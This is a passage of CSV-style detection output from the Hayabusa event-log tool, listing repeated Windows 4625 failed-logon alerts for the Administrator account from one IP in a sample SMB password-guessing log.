+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: 
